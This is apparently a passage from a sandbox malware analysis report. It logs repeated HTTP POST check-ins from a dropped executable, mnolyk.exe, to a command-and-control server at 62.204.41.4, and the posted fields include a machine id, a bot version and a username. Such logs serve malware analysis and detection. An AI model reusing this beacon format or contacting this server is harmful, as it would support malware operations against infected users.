                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:58.888118029 CET740INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:58 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            553192.168.2.45024862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:59.059890032 CET741OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:59.124011993 CET741INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:59 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            554192.168.2.45024962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:59.294790030 CET742OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:59.359090090 CET742INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:59 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            555192.168.2.45025062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:59.546505928 CET743OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:59.611418009 CET743INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:59 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            556192.168.2.45025162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:59.807890892 CET744OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:59.873145103 CET744INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:59 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            557192.168.2.45025262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:00.048499107 CET745OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:00.112935066 CET745INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:00 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            558192.168.2.45025362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:00.282449961 CET746OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:00.347563028 CET746INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:00 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            559192.168.2.45025462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:00.514766932 CET747OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:00.578994989 CET747INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:00 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            56192.168.2.44975162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:40.464030027 CET245OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:40.527021885 CET245INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:40 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            560192.168.2.45025562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:00.759371996 CET748OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:00.823412895 CET748INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:00 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            561192.168.2.45025662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:01.011214018 CET749OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:01.076416016 CET749INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:01 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            562192.168.2.45025762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:01.251488924 CET750OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:01.316854000 CET750INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:01 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            563192.168.2.45025862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:01.487832069 CET751OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:01.551681995 CET751INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:01 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            564192.168.2.45025962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:01.724391937 CET752OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:01.787542105 CET752INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:01 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            565192.168.2.45026062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:01.971811056 CET753OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:02.037451029 CET753INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:01 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            566192.168.2.45026162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:02.232460976 CET754OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:02.296423912 CET754INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:02 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            567192.168.2.45026262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:02.469569921 CET755OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:02.534327984 CET755INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:02 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            568192.168.2.45026362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:02.709618092 CET756OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:02.775855064 CET756INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:02 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            569192.168.2.45026462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:02.955745935 CET757OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:03.020263910 CET757INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:02 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            57192.168.2.44975262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:40.700037956 CET246OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:40.766264915 CET246INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:40 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            570192.168.2.45026562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:03.200849056 CET758OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:03.264765024 CET758INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:03 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            571192.168.2.45026662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:03.436703920 CET759OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
